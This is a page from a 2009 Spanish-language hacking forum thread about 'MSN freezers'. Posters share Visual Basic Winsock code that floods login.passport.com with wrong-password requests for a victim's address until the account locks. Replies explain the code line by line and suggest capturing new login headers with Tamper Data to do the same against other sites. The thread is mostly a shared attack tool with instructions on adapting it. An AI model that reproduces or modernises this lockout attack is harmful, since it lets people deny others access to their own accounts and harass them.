elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Compilacion de Congelador MSN.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Compilacion de Congelador MSN.  (Leído 8,847 veces)
Di~OsK


Desconectado Desconectado

Mensajes: 903



Ver Perfil WWW
Re: Compilacion de Congelador MSN.
« Respuesta #10 en: 14 Septiembre 2009, 22:25 pm »



Este fragmento de TU codigo es curioso:

Citar
.....Text1.Text + ",pwd=FREEZED-BY-WHK,lc....

 :-X


« Última modificación: 14 Septiembre 2009, 22:43 pm por DiOSx » En línea

Necesitas un servidor de TeamSpeak? Un certificado SSL? MANDA MP
ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Compilacion de Congelador MSN.
« Respuesta #11 en: 14 Septiembre 2009, 22:37 pm »

lol.


En línea

MazarD
Colaborador
***
Desconectado Desconectado

Mensajes: 885


mazard.info


Ver Perfil WWW
Re: Compilacion de Congelador MSN.
« Respuesta #12 en: 15 Septiembre 2009, 12:06 pm »

LOL

Aprovechando la duda de Vaati pongo una mia:
Estoy intentando conectar a una cuenta MSN creando una especie de cliente muy basico y todo el funcionamiento me va bien hasta que tengo que conectar ah:

Citar
login.passport.com 443

Segun el tutorial.... dice que tengo que enviar esto:

Código:
Private Sub login_Connect()
 Monitor2.Text = Monitor2.Text & "Cliente > " & " Conectado con exito al tercer servidor:" & vbCrLf
 Text4.BackColor = vbGreen
 login.SendData "GET/ login2.srf HTTP/1.0"
 login.SendData "Accept: */* "
 login.SendData "Host: login.passport.com "
 login.SendData "User-Agent: GirL "
 login.SendData "Authorization: Passport1.0.4 "
 login.SendData "OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,signin=hack.markus%40hotmail.es,pwd=xx0n," & Dlogin
End Sub

Y conecta y envia esos datos pero... es somo si nada.. el servidor se queda a la escucha de otra cosa parece..

Si quereis que os pegue el codigo completo me decis.

En ese punto debes conectar mediante ssl para hacer la petición, si te fijas tu mismo dices que el puerto es el 443 el cual corresponde habitualmente a https.
De todos modos seguramente sería mejor que abrieras otro tema.
En línea

-Learn as if you were to live forever, live as if you were to die tomorrow-

http://www.mazard.info
irc://irc.freenode.org/elhacker.net
yofoxD

Desconectado Desconectado

Mensajes: 169


Ver Perfil
Re: Compilacion de Congelador MSN.
« Respuesta #13 en: 16 Septiembre 2009, 07:31 am »

dios mio esto lammer no saben ni hacer un buen Copyboy  :xD
Jaja, que recuerdos con CopyBoy... :xD :xD :xD

jajaja copyboy ya es leyenda ;D
En línea

skyweb07

Desconectado Desconectado

Mensajes: 122


The ghost of the network


Ver Perfil
Re: Compilacion de Congelador MSN.
« Respuesta #14 en: 16 Septiembre 2009, 09:40 am »

Hola amigos de elhacker.net, queria saludarles y a la vez mostrarles mi aprendisaje.
Bueno este codigo fuente es:

Código
  1. Public Class Form1
  2.    Private Sub Command1_Click()
  3.    On Error Resume Next
  4.    Winsock1.Connect("login.passport.com", 80)
  5.    Timer1.Enabled = True
  6.    End Sub
  7.  
  8.  
  9.    Private Sub Timer1_Timer()
  10.    On Error Resume Next
  11.    Winsock1.SendData("GET /login2.srf HTTP/1.0" & vbCrLf)
  12.    Winsock1.SendData("Accept: */*" & vbCrLf)
  13.    Winsock1.SendData("Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=" + Text1.Text + ",pwd=FREEZED-BY-WHK,lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7" & vbCrLf)
  14.    Winsock1.SendData(vbCrLf)
  15.    Winsock1.SendData(vbCrLf)
  16.    End Sub
  17.  
  18.  
  19.    Private Sub Command2_Click()
  20.    On Error Resume Next
  21.    Timer1.Enabled = False
  22.    Winsock1.Close()
  23.    End Sub

El caso es que en este experimento que estado haciendo sobre los congeladores del msn queria que calificaceis mi avance, y que me ayudaran a encontrar donde esa el problema de este codigo.

Saludos y  muchas gracias por la atencion !


Haber si no me falla la memoria y mirando un poco el code te puedo decir que ese code es del CHAU MSN creo, aparte de ello siempre trata de ver lo que hace el programa y luego copia si quieres, no empiezes como lo hice yo  :-\

Bueno te explico algo el code :

Código:
 Private Sub Command1_Click()
    On Error Resume Next
    Winsock1.Connect("login.passport.com", 80)
    Timer1.Enabled = True
    End Sub

Primeri tienes que añadir un WInsock al Programa y Un Command Button

Winsock1.Connect("login.passport.com", 80) ' Aqui lo que hace es conectarse a hotmail con el winsock

Timer1.Enabled = True ' Inicia un Timer


Código:
Private Sub Timer1_Timer()
    On Error Resume Next
    Winsock1.SendData("GET /login2.srf HTTP/1.0" & vbCrLf)
    Winsock1.SendData("Accept: */*" & vbCrLf)
    Winsock1.SendData("Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=" + Text1.Text + ",pwd=FREEZED-BY-WHK,lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7" & vbCrLf)
    Winsock1.SendData(vbCrLf)
    Winsock1.SendData(vbCrLf)
    End Sub

Aqui esta parte esta Re-Mal ya que el Timer funciona sin saber si el Socket esta conectado por lo que el timer deberias activarlo en el evento del Winsock Connect para estar asegurados de que ya esta conectado y que puedes enviar todos esos datos

Código:
Winsock1.SendData("GET /login2.srf HTTP/1.0" & vbCrLf)
    Winsock1.SendData("Accept: */*" & vbCrLf)
    Winsock1.SendData("Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=" + Text1.Text + ",pwd=FREEZED-BY-WHK,lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7" & vbCrLf)
   Winsock1.SendData(vbCrLf)
    Winsock1.SendData(vbCrLf)

Aqui esta parte lo que hace es mandarle datos al servidor de hotmail con un passwords Mal  ( pwd=FREEZED-BY-WHK ) para que el mismo al pasar los 3 intentos de conexión con passwords mal se congele el msn por un tiempo hasta que deje de activar el timer ese y luego para de enviar passwords mal y se descongela el MSN despues de 3 minutos o algo asi.

PD : Creo que hotmail cambio ese metodo ya por lo que deberias utilizar algun programa coo Tamper Data para modificar las cabezeras del navegador y obtener la nueva forma de loguearse, asi mismo lo puedes hacer con cualquier otro sitio que necesite login ;)

Aqui un ejemplo de como seria modificar las cabezeras del Passaport de Hotmail con el Tamper Data


« Última modificación: 16 Septiembre 2009, 09:48 am por skyweb07 » En línea

‭‭‭‭jackl007


Desconectado Desconectado

Mensajes: 1.403


[UserRPL]


Ver Perfil WWW
Re: Compilacion de Congelador MSN.
« Respuesta #15 en: 16 Septiembre 2009, 13:41 pm »

gracias por el dato del Tamper :D
felizmnte salio algo bueno al post lammer :)
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
pregunto sobre el congelador o.o
Foro Libre
nightcode 4 2,305 Último mensaje 13 Octubre 2020, 21:02 pm
por Tachikomaia
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines